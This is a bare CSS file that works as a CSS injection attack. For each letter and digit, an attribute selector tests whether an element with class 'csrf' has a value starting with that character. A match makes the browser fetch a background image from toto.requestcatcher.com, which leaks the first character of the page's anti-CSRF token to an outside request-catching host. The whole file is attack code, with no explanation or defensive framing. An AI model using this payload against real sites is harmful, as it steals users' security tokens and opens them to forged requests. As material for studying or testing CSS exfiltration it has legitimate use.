
.csrf[value^="0"] {
    --starts-with-0:url("https://toto.requestcatcher.com/0");
}
input{
   background: var(--starts-with-0,none);
}

.csrf[value^="1"] {
    --starts-with-1:url("https://toto.requestcatcher.com/1");
}
input{
   background: var(--starts-with-1,none);
}

.csrf[value^="2"] {
    --starts-with-2:url("https://toto.requestcatcher.com/2");
}
input{
   background: var(--starts-with-2,none);
}

.csrf[value^="3"] {
    --starts-with-3:url("https://toto.requestcatcher.com/3");
}
input{
   background: var(--starts-with-3,none);
}

.csrf[value^="4"] {
    --starts-with-4:url("https://toto.requestcatcher.com/4");
}
input{
   background: var(--starts-with-4,none);
}

.csrf[value^="5"] {
    --starts-with-5:url("https://toto.requestcatcher.com/5");
}
input{
   background: var(--starts-with-5,none);
}

.csrf[value^="6"] {
    --starts-with-6:url("https://toto.requestcatcher.com/6");
}
input{
   background: var(--starts-with-6,none);
}

.csrf[value^="7"] {
    --starts-with-7:url("https://toto.requestcatcher.com/7");
}
input{
   background: var(--starts-with-7,none);
}

.csrf[value^="8"] {
    --starts-with-8:url("https://toto.requestcatcher.com/8");
}
input{
   background: var(--starts-with-8,none);
}

.csrf[value^="9"] {
    --starts-with-9:url("https://toto.requestcatcher.com/9");
}
input{
   background: var(--starts-with-9,none);
}

.csrf[value^="a"] {
    --starts-with-a:url("https://toto.requestcatcher.com/a");
}
input{
   background: var(--starts-with-a,none);
}

.csrf[value^="b"] {
    --starts-with-b:url("https://toto.requestcatcher.com/b");
}
input{
   background: var(--starts-with-b,none);
}

.csrf[value^="c"] {
    --starts-with-c:url("https://toto.requestcatcher.com/c");
}
input{
   background: var(--starts-with-c,none);
}

.csrf[value^="d"] {
    --starts-with-d:url("https://toto.requestcatcher.com/d");
}
input{
   background: var(--starts-with-d,none);
}

.csrf[value^="e"] {
    --starts-with-e:url("https://toto.requestcatcher.com/e");
}
input{
   background: var(--starts-with-e,none);
}

.csrf[value^="f"] {
    --starts-with-f:url("https://toto.requestcatcher.com/f");
}
input{
   background: var(--starts-with-f,none);
}

.csrf[value^="g"] {
    --starts-with-g:url("https://toto.requestcatcher.com/g");
}
input{
   background: var(--starts-with-g,none);
}

.csrf[value^="h"] {
    --starts-with-h:url("https://toto.requestcatcher.com/h");
}
input{
   background: var(--starts-with-h,none);
}

.csrf[value^="i"] {
    --starts-with-i:url("https://toto.requestcatcher.com/i");
}
input{
   background: var(--starts-with-i,none);
}

.csrf[value^="j"] {
    --starts-with-j:url("https://toto.requestcatcher.com/j");
}
input{
   background: var(--starts-with-j,none);
}

.csrf[value^="k"] {
    --starts-with-k:url("https://toto.requestcatcher.com/k");
}
input{
   background: var(--starts-with-k,none);
}

.csrf[value^="l"] {
    --starts-with-l:url("https://toto.requestcatcher.com/l");
}
input{
   background: var(--starts-with-l,none);
}

.csrf[value^="m"] {
    --starts-with-m:url("https://toto.requestcatcher.com/m");
}
input{
   background: var(--starts-with-m,none);
}

.csrf[value^="n"] {
    --starts-with-n:url("https://toto.requestcatcher.com/n");
}
input{
   background: var(--starts-with-n,none);
}

.csrf[value^="o"] {
    --starts-with-o:url("https://toto.requestcatcher.com/o");
}
input{
   background: var(--starts-with-o,none);
}

.csrf[value^="p"] {
    --starts-with-p:url("https://toto.requestcatcher.com/p");
}
input{
   background: var(--starts-with-p,none);
}

.csrf[value^="q"] {
    --starts-with-q:url("https://toto.requestcatcher.com/q");
}
input{
   background: var(--starts-with-q,none);
}

.csrf[value^="r"] {
    --starts-with-r:url("https://toto.requestcatcher.com/r");
}
input{
   background: var(--starts-with-r,none);
}

.csrf[value^="s"] {
    --starts-with-s:url("https://toto.requestcatcher.com/s");
}
input{
   background: var(--starts-with-s,none);
}

.csrf[value^="t"] {
    --starts-with-t:url("https://toto.requestcatcher.com/t");
}
input{
   background: var(--starts-with-t,none);
}

.csrf[value^="u"] {
    --starts-with-u:url("https://toto.requestcatcher.com/u");
}
input{
   background: var(--starts-with-u,none);
}

.csrf[value^="v"] {
    --starts-with-v:url("https://toto.requestcatcher.com/v");
}
input{
   background: var(--starts-with-v,none);
}

.csrf[value^="w"] {
    --starts-with-w:url("https://toto.requestcatcher.com/w");
}
input{
   background: var(--starts-with-w,none);
}

.csrf[value^="x"] {
    --starts-with-x:url("https://toto.requestcatcher.com/x");
}
input{
   background: var(--starts-with-x,none);
}

.csrf[value^="y"] {
    --starts-with-y:url("https://toto.requestcatcher.com/y");
}
input{
   background: var(--starts-with-y,none);
}

.csrf[value^="z"] {
    --starts-with-z:url("https://toto.requestcatcher.com/z");
}
input{
   background: var(--starts-with-z,none);
}

.csrf[value^="A"] {
    --starts-with-A:url("https://toto.requestcatcher.com/A");
}
input{
   background: var(--starts-with-A,none);
}

.csrf[value^="B"] {
    --starts-with-B:url("https://toto.requestcatcher.com/B");
}
input{
   background: var(--starts-with-B,none);
}

.csrf[value^="C"] {
    --starts-with-C:url("https://toto.requestcatcher.com/C");
}
input{
   background: var(--starts-with-C,none);
}

.csrf[value^="D"] {
    --starts-with-D:url("https://toto.requestcatcher.com/D");
}
input{
   background: var(--starts-with-D,none);
}

.csrf[value^="E"] {
    --starts-with-E:url("https://toto.requestcatcher.com/E");
}
input{
   background: var(--starts-with-E,none);
}

.csrf[value^="F"] {
    --starts-with-F:url("https://toto.requestcatcher.com/F");
}
input{
   background: var(--starts-with-F,none);
}

.csrf[value^="G"] {
    --starts-with-G:url("https://toto.requestcatcher.com/G");
}
input{
   background: var(--starts-with-G,none);
}

.csrf[value^="H"] {
    --starts-with-H:url("https://toto.requestcatcher.com/H");
}
input{
   background: var(--starts-with-H,none);
}

.csrf[value^="I"] {
    --starts-with-I:url("https://toto.requestcatcher.com/I");
}
input{
   background: var(--starts-with-I,none);
}

.csrf[value^="J"] {
    --starts-with-J:url("https://toto.requestcatcher.com/J");
}
input{
   background: var(--starts-with-J,none);
}

.csrf[value^="K"] {
    --starts-with-K:url("https://toto.requestcatcher.com/K");
}
input{
   background: var(--starts-with-K,none);
}

.csrf[value^="L"] {
    --starts-with-L:url("https://toto.requestcatcher.com/L");
}
input{
   background: var(--starts-with-L,none);
}

.csrf[value^="M"] {
    --starts-with-M:url("https://toto.requestcatcher.com/M");
}
input{
   background: var(--starts-with-M,none);
}

.csrf[value^="N"] {
    --starts-with-N:url("https://toto.requestcatcher.com/N");
}
input{
   background: var(--starts-with-N,none);
}

.csrf[value^="O"] {
    --starts-with-O:url("https://toto.requestcatcher.com/O");
}
input{
   background: var(--starts-with-O,none);
}

.csrf[value^="P"] {
    --starts-with-P:url("https://toto.requestcatcher.com/P");
}
input{
   background: var(--starts-with-P,none);
}

.csrf[value^="Q"] {
    --starts-with-Q:url("https://toto.requestcatcher.com/Q");
}
input{
   background: var(--starts-with-Q,none);
}

.csrf[value^="R"] {
    --starts-with-R:url("https://toto.requestcatcher.com/R");
}
input{
   background: var(--starts-with-R,none);
}

.csrf[value^="S"] {
    --starts-with-S:url("https://toto.requestcatcher.com/S");
}
input{
   background: var(--starts-with-S,none);
}

.csrf[value^="T"] {
    --starts-with-T:url("https://toto.requestcatcher.com/T");
}
input{
   background: var(--starts-with-T,none);
}

.csrf[value^="U"] {
    --starts-with-U:url("https://toto.requestcatcher.com/U");
}
input{
   background: var(--starts-with-U,none);
}

.csrf[value^="V"] {
    --starts-with-V:url("https://toto.requestcatcher.com/V");
}
input{
   background: var(--starts-with-V,none);
}

.csrf[value^="W"] {
    --starts-with-W:url("https://toto.requestcatcher.com/W");
}
input{
   background: var(--starts-with-W,none);
}

.csrf[value^="X"] {
    --starts-with-X:url("https://toto.requestcatcher.com/X");
}
input{
   background: var(--starts-with-X,none);
}

.csrf[value^="Y"] {
    --starts-with-Y:url("https://toto.requestcatcher.com/Y");
}
input{
   background: var(--starts-with-Y,none);
}

.csrf[value^="Z"] {
    --starts-with-Z:url("https://toto.requestcatcher.com/Z");
}
input{
   background: var(--starts-with-Z,none);
}
